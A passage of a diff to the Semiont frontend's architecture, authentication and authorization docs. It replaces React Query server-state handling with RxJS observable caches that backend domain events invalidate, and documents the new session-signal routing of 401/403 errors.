+// No manual cache invalidation: the backend's domain events (mark:create-ok,
+// mark:removed, …) drive the browse caches automatically.
 
-const cacheManager: CacheManager = {
-  invalidateAnnotations: (rId) => {
-    queryClient.invalidateQueries({ queryKey: ['annotations', rId] });
-  },
-  invalidateEvents: (rId) => {
-    queryClient.invalidateQueries({ queryKey: ['resources', 'events', rId] });
-  }
-};
-
-// Inject implementations via providers
+// Inject the implementation via the provider
 <AnnotationProvider annotationManager={annotationManager}>
-  <CacheProvider cacheManager={cacheManager}>
-    <App />
-  </CacheProvider>
+  <App />
 </AnnotationProvider>
 ```
 
 **Benefits:**
-- ✅ React UI library has **zero React Query dependency**
-- ✅ Apps can use React Query, SWR, Apollo, or any data fetching library
+- ✅ The UI library depends only on RxJS and the SDK's observable model — no external data-fetching library
+- ✅ Cache invalidation is automatic (domain-event driven), so host implementations stay thin
 - ✅ Easy to test with mock implementations
 - ✅ Clear separation of concerns
 
@@ -577,26 +556,25 @@ if (!session?.backendToken) {
 **Philosophy:** Components fetch their own data, not through props drilling.
 
 ```typescript
-// Each component fetches what it needs
-function DocumentView({ documentId }: { documentId: string }) {
-  const { data: doc } = api.documents.get.useQuery(documentId);
-  const { data: highlights } = api.annotations.getHighlights.useQuery(documentId);
-  // Note: API client uses 'annotations', but backend endpoint is still '/api/selections'
+// Each component subscribes to exactly the observables it needs
+function ResourceView({ resourceId }: { resourceId: ResourceId }) {
+  const semiont = useObservable(useSemiont().activeSession$)?.client;
+  const resource = useObservable(semiont?.browse.resource(resourceId));
+  const annotations = useObservable(semiont?.browse.annotations(resourceId));
+  // Each is `undefined` while loading and re-emits on every cache update
   // ...
 }
 ```
 
-### 4. Query Invalidation Over Manual Refetch
+### 4. Event-Driven Invalidation Over Manual Refetch
 
-**Philosophy:** Let React Query handle refetching automatically.
+**Philosophy:** Let backend domain events drive cache invalidation automatically.
 
 ```typescript
-// After mutation, invalidate queries
-const updateMutation = api.documents.update.useMutation({
-  onSuccess: () => {
-    queryClient.invalidateQueries(['/api/documents']);
-  }
-});
+// A write is just a verb call — no onSuccess, no invalidate.
+await semiont.mark.annotation(input);
+// The backend broadcasts mark:create-ok over the bus; the browse cache
+// invalidates the affected query and every subscriber re-renders.
 ```
 
 ### 5. Separation of Concerns
@@ -606,8 +584,8 @@ const updateMutation = api.documents.update.useMutation({
 - Toast notifications
 - Animation state (sparkles)
 
-**React Query handles server state:**
-- Documents
+**SDK observable caches handle server state:**
+- Resources
 - Annotations
 - Entity types
 

--- a/apps/frontend/docs/ARCHITECTURE.md
+++ b/apps/frontend/docs/ARCHITECTURE.md
@@ -20,7 +20,7 @@ This document describes the high-level architecture of the Semiont frontend appl
 The Semiont frontend is a Vite + React Router v7 SPA. The architecture emphasizes:
 
 - **Type Safety**: TypeScript throughout with strict mode enabled
-- **Server State Management**: React Query for all API interactions
+- **Server State Management**: RxJS observable caches on the SDK's verb-namespace client, invalidated automatically by backend domain events
 - **Authentication**: bearer-only — the SDK session holds the JWT in memory and sends `Authorization: Bearer`; no cookie, no frontend auth server
 - **No Global Mutable State**: All state is managed through React hooks and contexts
 - **Fail-Fast Philosophy**: No default values - explicit configuration required
@@ -33,7 +33,7 @@ The Semiont frontend is a Vite + React Router v7 SPA. The architecture emphasize
 - **TypeScript 5** - Type safety and developer experience
 
 ### State Management
-- **React Query (TanStack Query)** - Server state, caching, and data synchronization
+- **RxJS (BehaviorSubject)** - Server-state caching and live updates via the SDK's verb-namespace observables, subscribed through `useObservable`
 - **React Context** - UI state and cross-cutting concerns (keyboard shortcuts, toast notifications)
 - **i18next + react-i18next** - Internationalization
 
@@ -76,7 +76,7 @@ The frontend leverages **@semiont/react-ui**, a comprehensive framework-agnostic
 - **Session**: SessionTimer, SessionExpiryBanner
 
 #### Hooks & Utilities
-- **API Hooks**: React Query wrappers for all Semiont API operations
+- **Data Hooks**: `useObservable` / `useObservableBrowse` for subscribing to the SDK's verb-namespace observable caches
 - **UI Hooks**: useTheme, useKeyboardShortcuts, useToast, useDebounce
 - **Resource Hooks**: useResourceContent, useMediaToken
 - **Form Hooks**: useFormValidation with built-in validation rules
@@ -226,7 +226,7 @@ The solution is **media tokens** — short-lived JWTs scoped to a single resourc
 
 ```
 ResourceViewerPage
-  → useMediaToken(resourceId)       # React Query, staleTime: 4 min
+  → useMediaToken(resourceId)       # auth.mediaToken(id); refreshed every 4 min
       → POST /api/tokens/media
       → { token }
   → resourceUrl = `${baseUrl}/api/resources/${id}?token=${token}`
@@ -262,138 +262,62 @@ See [`@semiont/react-ui/docs/SESSION.md`](../../../packages/react-ui/docs/SESSIO
 
 ## API Integration
 
-### API Client Structure
+### Verb-Namespace Client
+
+Components never call REST routes or generated query hooks. Each per-KB `SemiontSession` owns a `SemiontClient` whose surface is a set of **verb namespaces** — methods grouped by intent rather than by resource:
 
 ```typescript
-// Type-safe API client with React Query hooks
-export const api = {
-  documents: {
-    get: {
-      useQuery: (id: string) => useAuthenticatedQuery(['/api/documents', id], ...)
-    },
-    list: {
-      useQuery: () => useAuthenticatedQuery(['/api/documents'], ...)
-    },
-    create: {
-      useMutation: () => useAuthenticatedMutation(...)
-    },
-    update: {
-      useMutation: () => useAuthenticatedMutation(...)
-    },
-    delete: {
-      useMutation: () => useAuthenticatedMutation(...)
-    }
-  },
-  annotations: { ... },  // Note: API still uses 'selections' endpoint, to be renamed later
-  entityTypes: { ... },
-  // ... other resources
-};
+const semiont = useObservable(useSemiont().activeSession$)?.client;
+
+// browse — reads. Live queries return CacheObservable<T> (subscribe via useObservable);
+//          one-shot reads return Promise<T>.
+semiont.browse.resource(id);         // CacheObservable<ResourceDescriptor>
+semiont.browse.annotations(id);      // CacheObservable<Annotation[]>
+semiont.browse.entityTypes();        // CacheObservable<string[]>
+semiont.browse.resourceContent(id);  // Promise<string> (one-shot)
+
+// mark / yield / frame / bind / gather / match — writes and long-running operations
+semiont.mark.annotation(input);      // Promise<{ annotationId }>
+semiont.mark.delete(rId, aId);       // Promise<void>
+semiont.yield.fromAnnotation(...);   // StreamObservable<YieldGenerationEvent>
+semiont.frame.addEntityType(type);   // Promise<void>
 ```
 
-### Query Keys
+`CacheObservable<T>` and `StreamObservable<T>` extend RxJS `Observable<T>` and are also `PromiseLike<T>`, so both `.subscribe()` (or `useObservable`) and `await` work without any wrapper. See [`@semiont/sdk` Usage.md](../../../packages/sdk/docs/Usage.md) for the full namespace API.
 
-React Query uses query keys to identify and cache queries. We follow **TanStack Query best practices** by centralizing query keys in a single source of truth.
+### Caching and Invalidation
 
-**Location:** `/src/lib/http-transport.ts`
+There are no query keys to manage. Each live `browse.*` query is backed by an internal `Cache` primitive keyed by its resource id. Caches invalidate themselves in response to backend **domain events** delivered over the bus gateway — call sites never invalidate anything by hand:
 
-**Structure:**
-```typescript
-export const QUERY_KEYS = {
-  auth: {
-    me: () => ['/api/auth/me'],
-  },
-  documents: {
-    all: (limit?: number, archived?: boolean) => ['/api/documents', limit, archived],
-    detail: (id: string) => ['/api/documents', id],
-    search: (query: string, limit: number) => ['/api/documents/search', query, limit],
-    events: (id: string) => ['/api/documents', id, 'events'],
-    highlights: (documentId: string) => ['/api/documents/:id/highlights', documentId],
-    references: (documentId: string) => ['/api/documents/:id/references', documentId],
-  },
-  entityTypes: {
-    all: () => ['/api/entity-types'],
-  },
-  // ... other resources
-};
-```
+| Domain event | Cache effect |
+|---|---|
+| `mark:create-ok` / `mark:removed` | Invalidate the resource's annotation list |
+| `mark:body-updated` | Write-through update to the annotation detail + list caches |
+| `mark:archived` / `mark:unarchived` | Invalidate the resource descriptor and resource lists |
+| `yield:create-ok` / `yield:update-ok` | Invalidate the resource descriptor and resource lists |
+| `frame:entity-type-added` | Invalidate the entity-types cache |
+| `frame:tag-schema-added` | Invalidate the tag-schemas cache |
 
-**Usage in Hooks:**
-```typescript
-// Query hook uses QUERY_KEYS
-getReferences: {
-  useQuery: (documentId: string) => {
-    return useAuthenticatedQuery(
-      QUERY_KEYS.documents.references(documentId),  // Single source of truth
-      `/api/documents/${documentId}/references`
-    );
-  }
-}
-```
-
-**Usage in Invalidation:**
-```typescript
-// Invalidation uses same key - guaranteed to match
-queryClient.invalidateQueries({
-  queryKey: QUERY_KEYS.documents.references(documentId)
-});
-```
-
-**Benefits:**
-- ✅ **Type-safe**: TypeScript autocomplete for all query keys
-- ✅ **Single source of truth**: Change key structure in one place
-- ✅ **No mismatches**: Impossible for hook and invalidation to use different keys
-- ✅ **Refactoring safety**: Rename/restructure without breaking cache invalidation
-- ✅ **Hierarchical invalidation**: Can invalidate all document queries or specific subsets
-
-**Anti-Pattern (Before):**
-```typescript
-// ❌ WRONG - Keys hardcoded in multiple places
-useAuthenticatedQuery(['/api/documents/:id/references', documentId], ...);
-queryClient.invalidateQueries({ queryKey: ['/api/selections', documentId, 'references'] });
-// These don't match! Cache invalidation silently fails.
-```
-
-**Best Practice (After):**
-```typescript
-// ✅ RIGHT - Keys from QUERY_KEYS constant
-useAuthenticatedQuery(QUERY_KEYS.documents.references(documentId), ...);
-queryClient.invalidateQueries({ queryKey: QUERY_KEYS.documents.references(documentId) });
-// Guaranteed to match!
-```
-
-**Why No `as const`:**
-```typescript
-// We don't use 'as const' because it creates readonly tuple types
-// which can cause React Query type mismatches
-() => ['/api/documents', id] as const  // ❌ Readonly tuple - avoid
-() => ['/api/documents', id]           // ✅ Mutable array - use this
-```
+On reconnect, a detected event gap (`bus:resume-gap`) triggers a blanket invalidation so no update is silently missed.
 
 ### Error Handling
 
-**Global Error Handlers:**
-```typescript
-// In QueryClient configuration
-import { notifySessionExpired, notifyPermissionDenied } from '@semiont/react-ui';
+**Auth failures (401 / 403):** The transport stamps every failure with a `TransportErrorCode` — `unauthorized` for 401, `forbidden` for 403 — and republishes them on `session.errors$`. `SemiontBrowser` subscribes to the active session's error stream and routes them to that session's `SessionSignals`:
 
-queryCache: new QueryCache({
-  onError: (error) => {
-    if (error instanceof APIError) {
-      if (error.status === 401) {
-        notifySessionExpired('Session expired');
-      } else if (error.status === 403) {
-        notifyPermissionDenied('Permission denied');
-      }
-    }
-  }
-})
+```typescript
+// SemiontBrowser, when a session activates (packages/sdk/src/session/semiont-browser.ts)
+session.errors$.subscribe((err) => {
+  if (err.code === 'unauthorized') signals.notifySessionExpired(err.message);
+  else if (err.code === 'forbidden') signals.notifyPermissionDenied(err.message);
+});
 ```
 
-`notifySessionExpired` / `notifyPermissionDenied` are module-scoped functions that route into whichever `KnowledgeBaseSessionProvider` is currently mounted (inside `AuthShell`). When no provider is mounted (e.g. on the landing page), these calls are no-ops.
+`SessionSignals` holds the modal state as `BehaviorSubject`s (`sessionExpiredAt$`, `permissionDeniedAt$`, …); `SessionExpiredModal` and `PermissionDeniedModal` render by subscribing to the browser's `activeSignals$` via `useObservable`. When no session is active (e.g. on the landing page), `activeSignals$` is `null`, so auth errors have nowhere to surface and are no-ops.
 
-**Component-Level:**
+**Component-level:** a live query carries its own loading/error state in the value it emits — `useObservable(semiont.browse.resource(id))` is `undefined` while loading. One-shot hooks such as `useResourceGraph` return an explicit `{ data, loading, error }` shape:
+
 ```typescript
-const { data, error } = api.documents.get.useQuery(id);
+const { graph, loading, error } = useResourceGraph(id);
 
 if (error) {
   return <ErrorDisplay error={error} />;
@@ -402,30 +326,28 @@ if (error) {
 
 ## Data Flow
 
-### Read Flow (Queries)
+### Read Flow (Live Queries)
 
 ```
 Component renders
-    └── useQuery hook checks cache
-        ├── Cache HIT → Return cached data + background refetch
-        └── Cache MISS → Fetch from API
-            └── useAuthenticatedAPI adds Bearer token
-                └── Fetch from backend
-                    └── Cache result + return data
+    └── useObservable(semiont.browse.resource(id))
+        └── browse Cache checks for the resource id
+            ├── Cache HIT  → emit cached value, revalidate in background
+            └── Cache MISS → transport fetches (Bearer token attached)
+                                └── cache result → Observable emits → component re-renders
 ```
 
-### Write Flow (Mutations)
+### Write Flow (Verb Methods)
 
 ```
-User action (e.g., click save)
-    └── Component calls mutation.mutateAsync()
-        └── useAuthenticatedAPI adds Bearer token
-            └── POST/PATCH/DELETE to backend
-                └── On success:
-                    ├── Invalidate related queries
-                    ├── Trigger automatic refetch
-                    └── UI updates with fresh data
+User action (e.g., create annotation)
+    └── await semiont.mark.annotation(input)   (Bearer token attached)
+        └── backend applies the change, broadcasts a domain event (mark:create-ok)
+            └── event arrives over the bus gateway → browse Cache invalidates the affected query
+                └── live Observable re-emits → subscribed components re-render
 ```
+
+No call site invalidates anything by hand — the domain event drives the cache update.
 
 ### Real-Time Updates (Bus Gateway)
 
@@ -452,25 +374,24 @@ The provider tree has two distinct layers:
 ```tsx
 // apps/frontend/src/app/providers.tsx
 <TranslationProvider>          // @semiont/react-ui — i18n
-  <QueryClientProvider>        // React Query (with auth-event dispatching in onError)
+  <SemiontProvider>            // @semiont/react-ui — the SemiontBrowser singleton (sessions, KBs, the per-KB SemiontClient + app-scoped event bus)
     <ToastProvider>            // @semiont/react-ui — toast notifications
       <LiveRegionProvider>     // @semiont/react-ui — screen reader announcements
         <KeyboardShortcutsProvider>  // app-specific
           <ThemeProvider>      // @semiont/react-ui — theme
-            <EventBusProvider> // @semiont/react-ui — RxJS event bus
-              <NavigationHandler />
-              {children}        // landing, about, privacy, terms, /auth/connect, /auth/error, /auth/signup, or any of the AuthShell-wrapped subtrees below
+            <NavigationHandler />
+            {children}          // landing, about, privacy, terms, /auth/connect, /auth/error, /auth/signup, or any of the AuthShell-wrapped subtrees below
 ```
 
 ### Auth shell (mounted in protected layouts only)
 
 ```tsx
-// apps/frontend/src/contexts/AuthShell.tsx
-<KnowledgeBaseSessionProvider>      // owns KB list, active KB, validated session, modal flags
-  <ProtectedErrorBoundary>          // catches render-time crashes inside the protected tree
-    <SessionExpiredModal />         // reads sessionExpiredAt from context
-    <PermissionDeniedModal />       // reads permissionDeniedAt from context
-    {children}                      // protected layout body
+// apps/frontend/src/contexts/AuthShell.tsx — no provider; the SemiontBrowser
+// singleton (mounted at the app root) already holds all session state.
+<ProtectedErrorBoundary>            // catches render-time crashes inside the protected tree
+  <SessionExpiredModal />           // reads sessionExpiredAt$ from the active session's signals
+  <PermissionDeniedModal />         // reads permissionDeniedAt$ from the active session's signals
+  {children}                        // protected layout body
 ```
 
 ### Where the auth shell mounts
@@ -514,9 +435,10 @@ apps/frontend/src/
 │   ├── config.ts          # i18next initialisation
 │   └── routing.tsx        # Link, useRouter, usePathname, useLocale
 ├── lib/                   # App-specific utility libraries
-│   ├── http-transport.ts      # API client setup with React Query
-│   ├── query-helpers.ts   # React Query utilities
-│   └── cacheManager.ts    # CacheManager implementation for @semiont/react-ui
+│   ├── env.ts             # Runtime environment configuration
+│   ├── routing.tsx        # Routing utilities
+│   ├── cookies/           # Cookie helpers
+│   └── browser-stubs/     # Browser API stubs
 └── types/                 # TypeScript type definitions
 
 packages/react-ui/src/      # Reusable React components library
@@ -773,11 +695,11 @@ Annotation overlays and panel entries synchronize via hover events for all media
 
 Two major refactors are complete:
 
-**MERGED-KB-SESSION** (Track 2 of AUTH-CLEANUP): Merged the previously-separate `KnowledgeBaseProvider`, `AuthProvider`, and `SessionProvider` into one library-side `KnowledgeBaseSessionProvider` in `@semiont/react-ui`.
+**MERGED-KB-SESSION** (Track 2 of AUTH-CLEANUP): Merged the previously-separate `KnowledgeBaseProvider`, `AuthProvider`, and `SessionProvider` into one library-side session model — now the `SemiontBrowser` singleton behind `SemiontProvider` in `@semiont/react-ui` (the interim `KnowledgeBaseSessionProvider` was itself later folded into it).
 - Frontend `AuthContext.tsx`, `KnowledgeBaseContext.tsx`, `useAuth.ts`, `useSessionManager.ts` are gone
 - Library `SessionContext.tsx`, `auth-events.ts`, and `dispatch401Error`/`dispatch403Error` are gone
-- Auth state via `useKnowledgeBaseSession()` from `@semiont/react-ui`
-- Cross-tree 401/403 signaling via `notifySessionExpired` / `notifyPermissionDenied`
+- Auth state via `useSemiont()` → `activeSession$` → `user$` from `@semiont/react-ui`
+- Cross-tree 401/403 signaling via the active session's `SessionSignals` (`notifySessionExpired` / `notifyPermissionDenied`)
 
 **NO-NEXTJS** (see `/NO-NEXTJS.md`): Replaced Next.js with Vite + React Router v7 + i18next.
 - `next build` → `vite build` (output: static files)

--- a/apps/frontend/docs/ARCHITECTURE.md
+++ b/apps/frontend/docs/ARCHITECTURE.md
@@ -443,13 +443,15 @@ apps/frontend/src/
 
 packages/react-ui/src/      # Reusable React components library
 ├── features/              # Feature-based components
-│   ├── auth/              # Authentication components
+│   ├── auth/              # Sign-in / sign-up components
 │   │   ├── components/
 │   │   │   ├── SignInForm.tsx         # Framework-agnostic sign-in
 │   │   │   ├── SignUpForm.tsx         # Framework-agnostic sign-up
-│   │   │   ├── AuthErrorDisplay.tsx   # Error display
-│   │   │   └── WelcomePage.tsx        # Welcome page
+│   │   │   └── AuthErrorDisplay.tsx   # Error display
 │   │   └── __tests__/     # Component tests
+│   ├── auth-welcome/      # Post-auth welcome / terms
+│   │   └── components/
+│   │       └── WelcomePage.tsx        # Welcome page
 │   ├── resource-viewer/   # Resource viewing components
 │   ├── resource-discovery/ # Discovery components
 │   └── ...                # Other feature modules
@@ -463,20 +465,21 @@ packages/react-ui/src/      # Reusable React components library
 │   └── ...                # Other reusable components
 ├── contexts/              # Provider Pattern contexts
 │   ├── AnnotationContext.tsx
-│   ├── CacheContext.tsx
-│   ├── ApiClientContext.tsx
-│   ├── TranslationContext.tsx
-│   └── KnowledgeBaseSessionContext.tsx
+│   ├── ResourceAnnotationsContext.tsx
+│   ├── RoutingContext.tsx
+│   ├── ThemeContext.tsx
+│   └── TranslationContext.tsx
 ├── hooks/                 # Reusable React hooks
-│   ├── useResourceAnnotations.ts
+│   ├── useObservable.ts
+│   ├── useResourceGraph.ts
 │   └── ...
 ├── lib/                   # Reusable utilities
 │   ├── annotation-registry.ts  # Annotation type metadata
-│   ├── api-hooks.ts       # API client utilities
+│   ├── validation.ts      # Form validation rules
 │   └── ...
 └── types/                 # Shared TypeScript interfaces
     ├── AnnotationManager.ts
-    ├── CacheManager.ts
+    ├── TranslationManager.ts
     └── ...
 ```
 
@@ -484,7 +487,7 @@ packages/react-ui/src/      # Reusable React components library
 - `apps/frontend/src` - Vite SPA pages and app-specific implementations
 - `packages/react-ui/src` - Framework-agnostic components and interfaces
 
-**Note**: Authentication components (SignInForm, SignUpForm, AuthErrorDisplay, WelcomePage) are framework-agnostic and live in `packages/react-ui/src/features/auth/`. The frontend provides React Router-specific wrappers that handle routing, translations, and auth state.
+**Note**: Authentication components (SignInForm, SignUpForm, AuthErrorDisplay) are framework-agnostic and live in `packages/react-ui/src/features/auth/`; the post-auth WelcomePage lives in `packages/react-ui/src/features/auth-welcome/`. The frontend provides React Router-specific wrappers that handle routing, translations, and auth state.
 
 See [`@semiont/react-ui/docs/`](../../../packages/react-ui/docs/) for documentation on the reusable component library.
 

--- a/apps/frontend/docs/ARCHIVE-CLONE.md
+++ b/apps/frontend/docs/ARCHIVE-CLONE.md
@@ -1,6 +1,6 @@
 # Archive and Clone Features
 
-> **⚠️ Note:** Code examples in this document use the old `apiService.*` pattern. The current architecture uses React Query hooks (`api.*`). See [ARCHITECTURE.md](./ARCHITECTURE.md) and [AUTHENTICATION.md](./AUTHENTICATION.md) for current patterns.
+> **⚠️ Note:** Code examples in this document use an older API pattern. The current architecture calls the SDK's verb-namespace client (`semiont.browse.*`, `semiont.mark.*`, …) and subscribes via `useObservable`. See [ARCHITECTURE.md](./ARCHITECTURE.md) and [AUTHENTICATION.md](./AUTHENTICATION.md) for current patterns.
 
 ## Overview
 

--- a/apps/frontend/docs/AUTHENTICATION.md
+++ b/apps/frontend/docs/AUTHENTICATION.md
@@ -145,8 +145,8 @@ false) is how the layout knows to render the unauth view with a
                          session fires sessionExpiredAt$ on the dead session (see below)
 
 3. Out-of-band 401/403 from any HTTP / bus call
-   └── QueryCache.onError (or similar) → notifySessionExpired() / notifyPermissionDenied()
-       └── Module-level notify calls into the active session's modal flags
+   └── transport stamps unauthorized/forbidden → session.errors$ → SemiontBrowser
+       └── routes to the active session's SessionSignals (notifySessionExpired / notifyPermissionDenied)
            └── Modal reads the flag via useObservable and surfaces
 
 4. Sign out
@@ -168,23 +168,25 @@ OAuth providers can be configured per KB on the backend. The flow:
 
 ## Cross-tree session signaling
 
-Code outside the React tree (React Query `QueryCache.onError`,
-`MutationCache.onError`, etc.) cannot call hooks. It signals the
-active session via module-scoped notify functions registered at
-provider mount:
+Auth failures originate in the transport, which lives outside the React
+tree and cannot call hooks. The transport stamps each failure with a
+`TransportErrorCode` and republishes it on `session.errors$`. The
+`SemiontBrowser` singleton subscribes to the active session's error
+stream and routes failures to that session's `SessionSignals`:
 
 ```typescript
-import { notifySessionExpired, notifyPermissionDenied } from '@semiont/react-ui';
-
-new QueryCache({
-  onError: (error) => {
-    if (error instanceof APIError) {
-      if (error.status === 401) notifySessionExpired('Your session has expired.');
-      if (error.status === 403) notifyPermissionDenied('Access denied.');
-    }
-  },
+// SemiontBrowser, on session activation (packages/sdk/src/session/semiont-browser.ts)
+session.errors$.subscribe((err) => {
+  if (err.code === 'unauthorized') signals.notifySessionExpired(err.message);
+  else if (err.code === 'forbidden') signals.notifyPermissionDenied(err.message);
 });
 ```
+
+`SessionSignals` exposes the modal state as `BehaviorSubject`s
+(`sessionExpiredAt$`, `permissionDeniedAt$`, …), surfaced by the browser
+as `activeSignals$`. `SessionExpiredModal` and `PermissionDeniedModal`
+subscribe to it via `useObservable` — so a failure raised entirely
+outside React still drives the UI.
 
 When no `SemiontProvider` is mounted (e.g. on the landing page),
 these calls are no-ops — the `SemiontBrowser`'s notify-handler

--- a/apps/frontend/docs/AUTHORIZATION.md
+++ b/apps/frontend/docs/AUTHORIZATION.md
@@ -280,14 +280,7 @@ describe('Authorization', () => {
 
 ### Environment Variables
 
-Currently no specific authorization environment variables. Future additions might include:
-
-```bash
-# Future configuration
-NEXT_PUBLIC_ENABLE_RBAC=true
-NEXT_PUBLIC_PERMISSION_CACHE_TTL=300
-NEXT_PUBLIC_ACCESS_REQUEST_ENABLED=true
-```
+There are currently no authorization-specific environment variables.
 
 ### Permission Definitions
 

--- a/apps/frontend/docs/AUTHORIZATION.md
+++ b/apps/frontend/docs/AUTHORIZATION.md
@@ -17,21 +17,24 @@ The current authorization system provides:
 
 ### Core Components
 
-#### 1. Role flags on `useKnowledgeBaseSession()`
+#### 1. Role flags from the active session's `user$`
 
-The merged session hook exposes coarse role flags derived from the authenticated user:
+Role flags live on the authenticated user, exposed by the active `SemiontSession` as `user$`:
 
 ```typescript
-import { useKnowledgeBaseSession } from '@semiont/react-ui';
+import { useSemiont, useObservable } from '@semiont/react-ui';
 
-const { isAdmin, isModerator } = useKnowledgeBaseSession();
+const session = useObservable(useSemiont().activeSession$);
+const user = useObservable(session?.user$);
+const isAdmin = user?.isAdmin ?? false;
+const isModerator = user?.isModerator ?? false;
 ```
 
-These come straight from the `getMe` response and are coarse — fine-grained permission scopes are still backend-only and a future enhancement.
+These come straight from the authenticated user record and are coarse — fine-grained permission scopes are still backend-only and a future enhancement.
 
 #### 2. PermissionDeniedModal (`@semiont/react-ui`)
 
-A library modal that surfaces when users encounter 403 errors. It reads from `KnowledgeBaseSessionContext` (specifically `permissionDeniedAt` and `permissionDeniedMessage`), so it appears whenever the active provider's flag becomes non-null. Recovery options:
+A library modal that surfaces when users encounter 403 errors. It reads the active session's `SessionSignals` (specifically `permissionDeniedAt$` and `permissionDeniedMessage$`, exposed by the browser as `activeSignals$`), so it appears whenever that signal becomes non-null. Recovery options:
 
 - **Go Back** - Return to previous page
 - **Go to Home** - Navigate to home page
@@ -39,52 +42,50 @@ A library modal that surfaces when users encounter 403 errors. It reads from `Kn
 
 The modal is mounted inside `AuthShell` alongside `SessionExpiredModal`.
 
-#### 3. notifyPermissionDenied (`@semiont/react-ui`)
+#### 3. `signals.notifyPermissionDenied` (`@semiont/sdk`)
 
-Code outside the React tree (the React Query `QueryCache.onError` and `MutationCache.onError` handlers) signals the active provider via a module-scoped notify function:
+A 403 from the backend surfaces on the transport's error stream; the `SemiontBrowser` observes it and raises the signal on the active session's `SessionSignals`:
 
 ```typescript
-import { notifyPermissionDenied } from '@semiont/react-ui';
-
-// In QueryCache.onError
+// inside SemiontBrowser, observing transport errors
 if (error instanceof APIError && error.status === 403) {
-  notifyPermissionDenied('You need admin access for this action');
+  signals.notifyPermissionDenied(error.message);
 }
 ```
 
-When no `KnowledgeBaseSessionProvider` is mounted (e.g. on the landing page), the call is a no-op. The provider clears the flag when the user dismisses the modal via `acknowledgePermissionDenied()`.
+When no session is active (e.g. on the landing page), `activeSignals$` is `null`, so nothing is raised. The signal is cleared (`clearPermissionDenied`) when the user dismisses the modal.
 
 ## 403 Error Handling Flow
 
 ```mermaid
 flowchart TD
     A[API Call] --> B{Response Status}
-    B -->|403| C[APIError Thrown]
-    C --> D[QueryCache.onError]
-    D --> E[notifyPermissionDenied]
-    E --> F[Provider sets permissionDeniedAt]
-    F --> G[PermissionDeniedModal reads context, shows]
+    B -->|403| C[APIError on transport.errors$]
+    C --> D[SemiontBrowser observes the error]
+    D --> E[signals.notifyPermissionDenied]
+    E --> F[permissionDeniedAt$ set on active session]
+    F --> G[PermissionDeniedModal reads activeSignals$, shows]
     G --> H{User Choice}
-    H -->|Go Back| I[Router.back + ack]
-    H -->|Go Home| J[Navigate to / + ack]
-    H -->|Switch Account| K[Sign In Flow + ack]
+    H -->|Go Back| I[Router.back + clear]
+    H -->|Go Home| J[Navigate to / + clear]
+    H -->|Switch Account| K[Sign In Flow + clear]
 ```
 
 ### Error Detection Layers
 
-1. **API Client Level** (`@semiont/http-transport`)
-   - Throws `APIError` with status: 403
-   - Preserves error context from backend
+1. **Transport Level** (`@semiont/http-transport`)
+   - Throws `APIError` with status: 403 and surfaces it on `transport.errors$`
+   - Preserves error context from the backend
 
-2. **React Query Level** (`apps/frontend/src/app/providers.tsx`)
+2. **Session Level** (`@semiont/sdk` — `SemiontBrowser`)
    ```typescript
    if (error instanceof APIError && error.status === 403) {
-     notifyPermissionDenied('Permission denied');
+     signals.notifyPermissionDenied('Permission denied');
    }
    ```
 
 3. **Component Level**
-   - Components inside `AuthShell` can read `isAdmin` / `isModerator` from `useKnowledgeBaseSession()` to disable or hide UI affordances proactively
+   - Components can read `isAdmin` / `isModerator` from the active session's `user$` (`useObservable(session?.user$)`) to disable or hide UI affordances proactively
 
 ## Security Considerations
 
@@ -195,7 +196,8 @@ Both systems use the same event-driven architecture for consistent error handlin
 
 ```typescript
 function MyComponent() {
-  const { isAdmin } = useKnowledgeBaseSession();
+  const session = useObservable(useSemiont().activeSession$);
+  const isAdmin = useObservable(session?.user$)?.isAdmin ?? false;
 
   if (!isAdmin) {
     return <ReadOnlyMessage />;

--- a/apps/frontend/docs/AUTHORIZATION.md
+++ b/apps/frontend/docs/AUTHORIZATION.md
@@ -210,15 +210,13 @@ function MyComponent() {
 ### Handling Permission Errors
 
 ```typescript
-// Using React Query mutation
-const deleteMutation = api.documents.delete.useMutation();
-
+// A verb call rejects on failure; a 403 also surfaces the modal automatically
 try {
-  await deleteMutation.mutateAsync(documentId);
+  await semiont.mark.delete(resourceId, annotationId);
 } catch (error) {
   if (error instanceof APIError && error.status === 403) {
-    // Automatically handled by global error handler
-    // PermissionDeniedModal will appear
+    // The transport stamped this as `forbidden` and already routed it to
+    // SessionSignals → PermissionDeniedModal appears
   }
 }
 ```
@@ -301,7 +299,7 @@ const permissions = {
 ### Common Issues
 
 1. **Modal not appearing on 403**
-   - Check if `notifyPermissionDenied` is being called from QueryCache.onError
+   - Check that the transport surfaced a `forbidden` error on `session.errors$` (it drives `notifyPermissionDenied`)
    - Verify `PermissionDeniedModal` is mounted inside `AuthShell`
    - Confirm the page is inside the protected layout boundary — outside it, no provider is mounted and the notify call is a no-op
    - Check browser console for errors

--- a/apps/frontend/docs/COMPONENT-LIBRARY.md
+++ b/apps/frontend/docs/COMPONENT-LIBRARY.md
@@ -50,17 +50,15 @@ composes the library.
 
 #### Hooks and utilities
 - `useObservable`, `useShellStateUnit`, `useResourceContent`, `useMediaToken`, `useLineNumbers`, `useHoverDelay`, `useKeyboardShortcuts`, `useToast`, `useSessionExpiry`, `useTheme`
-- `useEventBus`, `useEventSubscriptions`, `useApiClient`, `useAuthToken`, `useAuthToken$`, `useKnowledgeBaseSession`
+- `useSemiont`, `useEventSubscription`, `useEventSubscriptions`
 
 #### Providers and contexts
-- `EventBusProvider` — per-workspace RxJS EventBus
-- `AuthTokenProvider` — holds the token as a `BehaviorSubject<AccessToken | null>`
-- `ApiClientProvider` — constructs the `SemiontApiClient` from `baseUrl` + token observable
-- `KnowledgeBaseSessionProvider` — active KB + validated session; owns per-KB JWT storage
+- `SemiontProvider` — puts the `SemiontBrowser` singleton (sessions, KBs, the per-KB `SemiontClient`) into context; read via `useSemiont()`
 - `TranslationProvider` — pluggable i18n manager
-- `OpenResourcesProvider`, `ResourceAnnotationsProvider` — workspace state
+- `AnnotationProvider`, `ResourceAnnotationsProvider` — annotation + workspace state
+- `ThemeProvider`, `ToastProvider`, `LiveRegionProvider` — theming, toasts, a11y live region
 
-#### Flow state units (from `@semiont/http-transport`, re-exported)
+#### Flow state units (from `@semiont/sdk`, re-exported)
 - `createMarkStateUnit`, `createGatherStateUnit`, `createMatchStateUnit`, `createYieldStateUnit`, `createBindStateUnit`, `createBeckonStateUnit`, `createShellStateUnit`
 - Resource-page composition: `createResourceViewerPageStateUnit`
 
@@ -88,32 +86,41 @@ composes the library.
 The frontend mounts library providers directly — there is no app-side
 wrapper layer to maintain.
 
-### The Authenticated Provider Stack
+### The Provider Stack
+
+Global providers are mounted once at the app root
